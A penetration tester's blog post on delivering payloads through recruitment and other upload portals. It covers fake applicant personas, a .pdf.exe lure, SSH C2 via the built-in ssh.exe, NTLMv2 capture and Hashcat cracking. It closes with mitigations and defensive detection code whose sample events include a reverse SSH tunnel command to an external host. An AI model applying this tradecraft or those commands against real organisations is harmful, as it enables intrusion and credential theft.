
Phishing through Services (PtS)

Most organisations these days are very familiar with phishing and spear-phishing campaigns, and these are typically included in annual penetration testing activities.


Although we often have a great degree of success with these attacks, at Nexon we think outside the box and do things differently when it comes to pentests, to give our clients a true threat assessment and a real understanding of their risk profile.  Phishing is a must, but it only presents 50% of the picture...


Have you heard about Phishing through Services (or what we call PtS testing)?  It uses the same building blocks as a targeted phishing attack: we still generate documents or files carrying a payload that either connects our custom malware to our command and control (C2) infrastructure to give us access, or harvests data such as credentials, tokens or hashes.  The difference is that instead of trying to bypass email filtering (with hit-and-miss results), we deliver the attack through the organisation's own external-facing services, such as the cloud platforms it exposes to the outside world.


To understand why PtS is effective: most organisations now have a pretty solid mail security stack.  Yes, we can still bypass email filtering and get emails delivered, but it is getting harder, it limits what sort of attacks and payloads we can send, and it is inconsistent: some emails get through and some don't.  Then there is user awareness.  Staff are now well used to looking for indicators of phishing, and their Outlook or mail client warns them that a message 'stems from an outside address, be suspicious and do not click on links' (or whatever the corporate banner says).

PtS sidesteps all of that because, in our experience, 95% of the time organisations allow-list their SaaS platforms in their email filtering, so notifications and forwarded submissions land directly in staff mailboxes without inspection or interruption.  PtS is also an area most training programs miss: organisations train staff to identify phishing, smishing, QR codes and vishing, but not the inherent risk of a legitimate business system or process being abused.  We are talking about the unexpected, the known unknowns.


Most organisations have at least two layers of email filtering: the protection built into Microsoft 365 (Exchange Online Protection) or Google Workspace, plus a third-party gateway such as Proofpoint, Mimecast or MailGuard.  As standard mail best practice, most now also publish SPF, DKIM and DMARC records, which together let receiving systems verify that a message really came from an authorised sender for the claimed domain and was not altered in transit, making direct spoofing of the organisation's own domains much harder.  Then there is domain reputation: when mail starts arriving from a newly registered domain, filtering often distrusts it for the first 30 to 60 days (making phishing harder), and blocklisting of domains and IP addresses plays a part in success as well.

 

So, as you can see, there are a lot of factors in play with email phishing.  When it comes to PtS, what sort of services are we talking about?  The services that work well for me:

  • Recruitment platforms - self-explanatory: anywhere CVs, cover letters and similar documents can be uploaded.

  • Permit and WHS/OHS systems - where contractors and visitors upload permits, safety forms and requests for on-site access (I commonly find these at shipping terminals, refineries and processing plants).

  • Survey sites - some organisations post surveys for employees (and sometimes the wider public) to respond to; these often have file upload areas.

  • Portfolio / showcase platforms - for creative professionals (designers, artists, photographers) to showcase their work (images, PDFs, video links).  Anyone can create an account and upload a portfolio or images.

  • Journalism / citizen reporting platforms - some news organisations and investigative journalism initiatives use custom-built or specialised SaaS platforms that allow the public to submit documents, photos or videos related to a story.  Whistleblowing portals are the same idea: these days it is not uncommon to find an organisation running a public whistleblower web service that can be used in the same way.

  • Contest / competition platforms - platforms that host online contests (writing competitions, photography contests, design challenges) often allow users to register and upload their entries.  These might be general platforms or specialised for particular types of contest.

  • Fan-fiction / writing communities - platforms where writers upload stories, poems or other creative writing, for example Wattpad.

  • Crowdsourcing / citizen science platforms - some projects involve public contributions of data or documents (historical document transcription, environmental data submission and so on).  These platforms often have specific forms and allow uploads.

  • Standard file request and secure drop-off services - such as Dropbox file requests, Google Forms (with file upload enabled), ShareFile, files.com and the custom file transfer services organisations build or employ.

  • E-commerce and customer service platforms - for example, retailers often have an order support bot, form or email address where customers submit order issues and requests.

  • Local council request forms - nearly all councils have forms where residents can submit maintenance requests, log hazards and raise other customer requests; these have worked very well for me in the past.

 

I think you get the picture: there are lots of platforms readily available for abuse if they are not safeguarded appropriately.

In a recent engagement for a large retailer, they were advertising a number of positions via an Oracle Cloud recruitment platform.  Most major retailers here in Australia use Oracle Cloud for recruitment, and universities often lean towards Workday.

 

Here is an example of a job posting hosted on Oracle Cloud:

Job position example

I applied for many roles within the same organisation (around 10), all with different personas.  Why not just choose one or two?


If I submit a single application with a malicious file, HR / recruitment teams will often view it as a problem with one person's CV, isolated to that applicant.  If the same issue shows up across a large number of submissions, it is almost always treated as a 'system' issue, which forces further investigation by the organisation, and that in turn results in the payloaded files being forwarded to multiple people in the organisation to 'test'.


For my myriad of personas, I used a mixture of:

  • Different domains (I purchased 8 different domains)

  • Different email platforms - 8 were set up to send via M365, but one was a standard Gmail account (@gmail.com) and one a Proton Mail address, to look independent and to make it look like a system issue.

  • Different email formats and stationery

  • Different Names

  • Different Sexes

  • Different Phone numbers

  • Different locations / addresses (I made sure all addresses were within 20 kilometres of the role location, for maximum HR interest)

  • Different Countries (as large retailers will have multiple recruitment team members in different regions)

  • Different CV and cover letter formats

  • Different people images

 

I then used Office to build the various CVs.  The actual CV and cover letter content was generated with AI, but the CVs themselves were built from scratch around that content.  It is VERY time-consuming to build nice CVs, but making them as realistic as possible requires a lot of effort.  Once the content was generated, I overlaid it with a blurred image, and then overlaid that again with my own images and content.  In this phish I used Oracle image branding to make it look like a platform error, with a link enticing the user to access the original content.


Here are some examples of the CVs and cover letters I created.

CV Example
Cover letter example
CV Example
CV Example
CV Example

When clicked, the links in the 'error messages' would prompt the user to download a zip file from a web server I was hosting:

Download zip

 

Once opened, they would be presented with either an exe, an HTML file, or both.

zip contents

If the user extracted the .pdf.exe file, it would look like a legitimate PDF file:

Adobe icon

Once run (either from inside the zip or as an extracted file), a PowerShell process generates a PDF and brings it to the front of all other windows:

Now behind the scenes we have a lot going on.  First, we have a command and control (C2) server listening for SSH connections.  The OpenSSH client (ssh.exe) ships installed by default on recent builds of Windows 10 and on Windows 11, so it is present on most fleets unless someone has specifically removed it; in my experience 95% of organisations don't even know it is there, let alone think to disable it.  The payload in the file establishes an outbound SSH connection to the C2 using that built-in, Microsoft-signed client, so the tunnel is carried by a legitimate Windows process rather than by anything we had to drop on disk, and that is why it sailed past endpoint protection (EDR) here.  Be careful with the word 'bypass', though: the signed client only defeats signature-based blocking of the tunnel binary itself, and a well-tuned EDR can still flag the process chain (a document-looking executable spawning PowerShell, which spawns ssh.exe to an external host).  Once the channel is up, the implant makes the machine authenticate to an SMB listener on my C2 (a Metasploit SMB capture listener), which records the user's NTLMv2 challenge-response, and the SSH session gives me a separate channel to send instructions to the endpoint.


To be OPSEC safe and avoid detection, we don't execute commands that would be picked up by EDR; we only gather information such as system details and the username as a proof of concept (PoC).  The most important part is the NTLMv2 response; that is the data we are really after.


So what is an NTLMv2 hash?  Let's get a bit technical for a minute.  Although Microsoft's preferred authentication protocol for Active Directory domains is Kerberos, NTLMv2 is still widely used and enabled at most organisations, often as a fallback or for compatibility with legacy systems, workgroup environments and specific applications.

What we capture on the wire (strictly, the Net-NTLMv2 challenge-response) isn't a direct hash of the password in the way a simple hash would be.  It is a keyed calculation that takes in the NT hash of the user's password (an MD4 hash of the UTF-16 password, stored on the domain controller or in the local SAM database), a server challenge (the random number sent by the server), a client challenge (a random value generated by the client, packaged with a timestamp and other data) and the username and domain name.


In the Windows world it is used to verify a user's identity.  When a client accesses a resource on a Windows network (a shared folder, an application, a remote desktop session), the NTLMv2 exchange proves that the client knows the password for the account without ever transmitting the password itself.  It also plays into single sign-on (SSO) in some contexts: NTLMv2 lets a user authenticate once and then reach multiple resources without re-entering credentials, which is also why Windows will silently attempt to authenticate when something on the host reaches out to an attacker-controlled SMB server.


From an attacker's perspective we LOVE capturing NTLMv2.  A word of precision, though, because the two things people call 'NTLM hashes' are not interchangeable: the Net-NTLMv2 response we capture with an SMB listener can be relayed to another server while the authentication is in flight (NTLM relay) and can be cracked offline with tools such as Hashcat (mode 5600), but it cannot be used in Pass-the-Hash.  Pass-the-Hash needs the raw NT hash, which you only get from a cracked password, a SAM/NTDS dump or LSASS, never from the wire.


My attack was indeed successful, returning a large number of hashes.  Here are some of the hashes we received:

hashes

With the hashes in hand, I ran them through Hashcat (a password cracker) using GPUs and mutated wordlists, successfully recovering 3 of them:

Cracking hashes with Hashcat

This gave me the plain-text passwords for those users.  Two of the accounts were HR staff (to be expected), but the third belonged to the actual Oracle administrator, who works in IT!

As predicted, the multiple appearances of the 'error' caused the recruitment team to send it to the Oracle admin to investigate, who in turn handed over his hash during his investigation.


Pretty cool, hey?  As you can see, PtS can be devastatingly successful.

 

Once we have clear-text credentials, I will then perform one or more of the following:

  • Credential reuse (often loosely called credential stuffing): try the recovered password against every externally reachable service the organisation has, to see where it works and which services enforce MFA.

  • Attempt to bypass MFA, for example on cloud services like M365 by probing Microsoft Graph and other Entra endpoints for sign-in paths the MFA policy does not cover, or by launching an MFA fatigue attack (repeatedly prompting the user until they approve).

  • Use the password in other attacks, such as joining their WPA2-Enterprise wireless network (AD/RADIUS authentication), or in a physical attack: plugging in an implant, USB device or rogue device with local network access and then using the credentials to reach company resources.

 

In this instance the client was very mature on the security side: MFA was enforced on every service, combined with SSO and other controls, which prevented us from using the credentials from outside or remotely from the network.


We then worked with the client to launch additional, similar attacks targeting their customer orders / support team, and performed a physical pentest, bypassing reception and implanting a rogue device into a network point inside their office.  We then accessed that device remotely to perform further testing using the account and local network access, giving them a real threat assessment that explored multiple avenues of exploitation.


At this stage, let's call out the remediation and mitigation activities that prevent this attack and others like it:

 

Outside The Network

  • MFA on everything, applied to every user and every service.

  • Implement platform-side scanning of uploaded files (anti-malware and sandbox detonation on the SaaS side, which is a different control from endpoint EDR) so that files containing potentially malicious content are detected when they are uploaded, and have the platform reject archives, executables and HTML outright where the business process has no need for them.

  • Extend detection to cover cloud services, so indicators of attack, or pre-staging via these platforms ahead of a larger attack, are visible.  In the engagement above, I obtained a number of user password hashes without any SOC detection because they were only monitoring M365, the data centres and the local networks.

  • Ensure that submissions to these platforms are not emailed to staff under an allow-list.  All notification emails and forwarded submissions should pass through the organisation's mail filtering controls so they are checked for malicious content and impersonation.
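As an added example of what the platform-side file vetting above can look like (my own illustration; not code from the original post, and not how Oracle, Workday or any other platform implements it), the Python below inspects an upload before it is forwarded to staff.  It enforces an extension allow-list, refuses the executable and HTML types used in the lure, looks for the document-extension-followed-by-executable masquerade (CV.pdf.exe), checks that the bytes match the claimed type, and opens zip archives to apply the same checks to each member while reading only a header from each one, so a decompression bomb cannot be triggered and an encrypted member is flagged rather than silently skipped.  The sample archive is constructed to mirror the zip described earlier; the policy lists and names are assumptions.

```python
import io
import re
import zipfile

# Policy (assumed for this example): what a recruitment or request-form upload may contain.
ALLOWED_EXT = {".pdf", ".docx", ".txt", ".png", ".jpg", ".jpeg", ".zip"}
BLOCKED_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".js", ".jse", ".vbs", ".vbe",
               ".wsf", ".hta", ".lnk", ".msi", ".dll", ".html", ".htm", ".svg", ".iso", ".img"}
# Magic bytes used to sanity-check that the content matches the claimed type.
MAGIC = {b"MZ": "pe-executable", b"%PDF": "pdf", b"PK\x03\x04": "zip", b"\x89PNG": "png", b"\xff\xd8\xff": "jpeg"}
EXPECTED_KIND = {".pdf": "pdf", ".docx": "zip", ".zip": "zip", ".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg"}
# CV.pdf.exe, report.docx.scr and friends: a document extension followed by an executable one.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(exe|scr|com|pif|bat|cmd|js|vbs|hta|lnk|msi)$", re.I)
HEADER_BYTES = 8      # enough for every magic value above; never inflate a whole member
MAX_MEMBERS = 50


def sniff(head: bytes) -> str:
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return "unknown"


def split_name(name: str):
    """Return (basename, lowercase extension) for a plain or archive-member path."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    ext = base[base.rfind("."):].lower() if "." in base else ""
    return base, ext


def vet_file(name: str, head: bytes) -> list:
    """Checks for one file given its name and the first few bytes of its content."""
    base, ext = split_name(name)
    kind = sniff(head)
    findings = []
    if ext in BLOCKED_EXT:
        findings.append(f"{base}: blocked extension {ext}")
    elif ext not in ALLOWED_EXT:
        findings.append(f"{base}: extension {ext or '(none)'} not on the allow-list")
    if DOUBLE_EXT.search(base):
        findings.append(f"{base}: document extension followed by an executable extension (masquerade)")
    if kind == "pe-executable":
        findings.append(f"{base}: content is a Windows PE executable regardless of its name")
    expected = EXPECTED_KIND.get(ext)
    if expected and kind != expected:
        findings.append(f"{base}: claims {ext} but content looks like {kind}")
    return findings


def vet_upload(name: str, data: bytes) -> list:
    """Vet an upload; a .zip is opened and every member is vetted from its header only."""
    findings = vet_file(name, data[:HEADER_BYTES])
    _, ext = split_name(name)
    if ext == ".zip" and sniff(data[:HEADER_BYTES]) == "zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                members = [m for m in zf.infolist() if not m.is_dir()]
                if len(members) > MAX_MEMBERS:
                    return findings + [f"{name}: {len(members)} members exceeds limit of {MAX_MEMBERS}"]
                for m in members:
                    if m.flag_bits & 0x1:                       # encrypted member: cannot be inspected
                        findings.append(f"{m.filename}: encrypted archive member (unscannable)")
                        continue
                    with zf.open(m) as fh:
                        findings += vet_file(m.filename, fh.read(HEADER_BYTES))
        except zipfile.BadZipFile:
            findings.append(f"{name}: corrupt or malformed archive")
    return findings


def build_lure_archive() -> bytes:
    """Constructed sample mirroring the zip in the post: a .pdf.exe, an HTML file and a real-looking PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Jane_Smith_CV.pdf.exe", b"MZ\x90\x00" + b"\x00" * 60)        # a PE header stub only
        zf.writestr("Jane_Smith_CV.html", b"<html><script>/* constructed */</script></html>")
        zf.writestr("Jane_Smith_CV.pdf", b"%PDF-1.7\n% constructed benign stub\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in vet_upload("Jane_Smith_Application.zip", build_lure_archive()):
        print("REJECT:", finding)
    print("clean PDF:", vet_upload("cv.pdf", b"%PDF-1.7\n%constructed\n") or "accepted")
```

Note the limit of this control: the CVs in this engagement were themselves clean documents carrying a link, and it was the zip fetched from that link that held the executable.  Content vetting like the above stops the zip at whatever point it enters the organisation (an upload, a mail attachment or a download gateway); the link itself needs URL reputation or detonation, and the notification path still has to go through mail filtering as the previous point says.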

 

Inside the network

  • Prioritise Kerberos for authentication, and audit then restrict NTLM usage (the 'Network security: Restrict NTLM' group policies let you audit first and then block; denying outgoing NTLM to remote servers is what stops the capture described above).

  • Employ strong password controls: banned password lists, passphrases and a minimum of 12 characters (follow the NIST SP 800-63B recommendations).

  • Enable NTLM mitigations: configure SMB and LDAP signing and Extended Protection for Authentication (EPA) on relevant servers to mitigate NTLM relay, and block outbound SMB (TCP 445) at the perimeter so workstations cannot authenticate to internet-hosted SMB listeners at all.

  • Standard housekeeping: regular patching, XDR adoption, a SOC and SIEM, and so on.

  • Consider deep packet inspection (DPI) / SSL inspection on the network, combined with IPS and egress filtering (outbound SSH from workstations to arbitrary internet hosts should not be allowed), to detect and block C2 channels.

  • Ensure all staff devices run EDR/XDR, both company-issued and personal devices (if BYOD is allowed).
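The endpoint and network telemetry these controls should feed can be turned into a handful of rules.  The Python below is an added example (my own, not from the original post or any product) that runs four detections over Sysmon-style process-creation and network-connection events: a document-looking executable (.pdf.exe) launched from a user-writable path, a shell spawned by such a process, ssh.exe spawned by a script host or Office process or connecting to an external host, and SMB (TCP 445) egress to a non-internal address, which is the NTLM capture vector.  The events, field names, paths, command lines and the 203.0.113.10 address are constructed; the internal ranges are assumed to be RFC 1918 plus loopback and link-local.

```python
import ipaddress
import re
from pathlib import PureWindowsPath

# Assumed internal ranges; substitute the organisation's own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# Parents that should not normally be launching the OpenSSH client.
SCRIPT_OR_OFFICE = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                    "mshta.exe", "winword.exe", "excel.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
USER_WRITABLE = (r"\appdata\local\temp", r"\downloads", r"\appdata\roaming", r"\users\public")
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png|txt)\.(exe|scr|com|pif|bat|cmd|js|vbs|hta|lnk)$", re.I)


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def detect(events) -> list:
    """Run the rules over Sysmon-style events (constructed dicts; field names are assumed)."""
    alerts = []
    for e in events:
        image = PureWindowsPath(e["image"]).name.lower()
        if e["event"] == "process_create":
            parent = PureWindowsPath(e["parent_image"]).name.lower()
            if DOUBLE_EXT.search(image) and in_user_writable(e["image"]):
                alerts.append(f"masquerade: {image} launched from user-writable path by {parent}")
            if image in SHELLS and in_user_writable(e["parent_image"]):
                alerts.append(f"shell {image} spawned by {parent} running from user-writable path")
            if image == "ssh.exe" and (parent in SCRIPT_OR_OFFICE or in_user_writable(e["parent_image"])):
                alerts.append(f"ssh.exe spawned by {parent}: {e['command_line']}")
        elif e["event"] == "network_connect":
            if e["dest_port"] == 445 and is_external(e["dest_ip"]):
                alerts.append(f"SMB egress from {image} to {e['dest_ip']}:445 (NTLM capture/relay vector)")
            if image == "ssh.exe" and is_external(e["dest_ip"]):
                alerts.append(f"ssh.exe outbound to external host {e['dest_ip']}:{e['dest_port']}")
    return alerts


# Constructed telemetry mirroring the chain in the post, followed by two benign events.
TEMP = r"C:\Users\hr.jane\AppData\Local\Temp\Temp1_Jane_Smith_CV.zip"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SSH = r"C:\Windows\System32\OpenSSH\ssh.exe"
SAMPLE_EVENTS = [
    {"event": "process_create", "image": TEMP + r"\Jane_Smith_CV.pdf.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "Jane_Smith_CV.pdf.exe"},
    {"event": "process_create", "image": PS, "parent_image": TEMP + r"\Jane_Smith_CV.pdf.exe",
     "command_line": 'powershell.exe -w hidden -nop -c "# constructed stager"'},
    {"event": "process_create", "image": SSH, "parent_image": PS,
     "command_line": "ssh.exe -N -R 8443:127.0.0.1:8443 c2user@203.0.113.10"},
    {"event": "network_connect", "image": SSH, "dest_ip": "203.0.113.10", "dest_port": 22},
    # The NTLMv2 response leaves via the kernel SMB redirector (PID 4 'System'), not the malware process.
    {"event": "network_connect", "image": "System", "dest_ip": "203.0.113.10", "dest_port": 445},
    # Benign: an admin using the OpenSSH client from Windows Terminal to an internal host.
    {"event": "process_create", "image": SSH,
     "parent_image": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\WindowsTerminal.exe",
     "command_line": "ssh.exe admin@10.20.30.40"},
    {"event": "network_connect", "image": SSH, "dest_ip": "10.20.30.40", "dest_port": 22},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The SMB alert fires on the System process because the kernel SMB client, not the malware, performs the outbound authentication; a rule keyed on the malicious process name alone would miss it.  The benign administrator's ssh.exe session from Windows Terminal to an internal host produces no alert, which is the point of keying the ssh.exe rules on the parent and the destination rather than on the binary.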


Processes and Staff

  • Train staff on PtS attacks, in particular HR/recruitment and frontline support staff such as customer service, alongside standard end-user training on current threats such as deepfakes, AI-assisted lures and QR phishing.

  • Implement processes to reject or vet documents and submissions containing potentially malicious content.

  • IT should have documented processes for vetting user password reset and MFA reset requests.

 

These are the types of advanced attacks you can expect from any red team assessment or advanced pentest with my team 😊

 

In my next blog, I'll talk about another service we offer and execute for pentest customers: reconnaissance / OSINT exercises and threat assessments of the executive team and board members.  It is basically a personal pentest, profiling executives and board members to determine the attack avenues that could be used to compromise them and their access to the organisation's network.  Stay tuned!

 

Lastly, if you want to see what your threat profile looks like with a next-level pentest from Australia's best pentest team, exploring out-of-the-box attack avenues, please reach out: pentestenquiries@corp.nexon.com.au

 
 
 



© 2024 Dan Weis

danweis.me
